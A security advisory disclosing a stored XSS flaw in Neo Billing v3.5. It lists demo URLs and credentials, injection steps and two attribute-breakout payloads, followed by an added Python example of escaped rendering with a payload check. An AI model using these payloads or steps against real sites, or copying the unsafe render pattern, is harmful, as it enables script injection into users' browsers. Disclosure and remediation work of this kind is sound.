[*] :: Title: Neo Billing - Accounting, Invoicing And CRM Software v3.5 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-26
[*] :: Software: Neo Billing - Accounting, Invoicing And CRM Software v3.5
[?] :: Technical Details & Description:
# Weak security measures, namely poor filtering of input field data, have been discovered in the «Neo Billing - Accounting, Invoicing And CRM Software». The current version of this web application is 3.5.
[?] :: Demo Website:
# https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Backend (admin): http://billing.ultimatekode.com/neo/autologin/?role=1
# Backend (user): http://billing.ultimatekode.com/neo/crm
# Login/Password (admin): superadmin@example.com/123456
# Login/Password (user): customer@example.com/123456
[!] :: Special Note:
# Payloads like sample #1 are not recommended because they will break the page you are working with. It is better to use a payload based on sample #2.
[!] :: For developers:
# Disabling data changes on demo websites does not make your applications more secure. It is good for business and sales, but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# http://billing.ultimatekode.com/neo/projects
# http://billing.ultimatekode.com/neo/productcategory/edit?id=15
# http://billing.ultimatekode.com/neo/stockreturn/edit?id=1063
[+] :: PoC [Stored XSS Injection]:
# Log in to the demo website as admin or as a regular user, then go to any page with a text field, e.g. http://billing.ultimatekode.com/neo/productcategory/edit?id=13
# Click the «Edit» button and, inside any text field, first type "> to «close» the input field, then enter your payload and save the data; your code will be stored and injected into the page.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">
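# The root cause above is a stored value being written back into a value="..." attribute without attribute-context escaping. The following is an added example (not code from the advisory or from Neo Billing) showing the vulnerable rendering pattern beside the corrected one, plus a check that the two sample payloads no longer yield extra elements or on* handlers; the field name "name" and the helper names are assumptions.

```python
"""Added example: attribute-context escaping of a stored field value, with a check
that the advisory's two payloads no longer inject elements. Standard library only."""
from html import escape
from html.parser import HTMLParser

# The two sample payloads quoted in the advisory, used here as test input.
PAYLOADS = [
    "\"><script>alert('QUIXSS')</script>",
    "\"><img src=\"x\" onerror=\"alert('QUIXSS');\">",
]


def render_unsafe(value):
    """Vulnerable pattern: the stored value is dropped straight into value="..."."""
    return '<input type="text" name="name" value="%s">' % value


def render_safe(value):
    """Fixed pattern: escape &, <, > and both quote characters (quote=True),
    so a leading "> cannot terminate the attribute or the tag."""
    return '<input type="text" name="name" value="%s">' % escape(value, quote=True)


class _TagCollector(HTMLParser):
    """Records start tags and any on* event-handler attributes in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(k for k, _ in attrs if k.lower().startswith("on"))


def injected_elements(fragment):
    """Return every tag beyond the one intended <input>, plus any on* handlers.
    An empty list means the stored value stayed inert inside the attribute."""
    parser = _TagCollector()
    parser.feed(fragment)
    tags = list(parser.tags)
    if tags and tags[0] == "input":
        tags.pop(0)
    return tags + parser.handlers
```

The same check can be run over any rendered form in a test suite: feed each stored field through the template and assert `injected_elements()` returns an empty list.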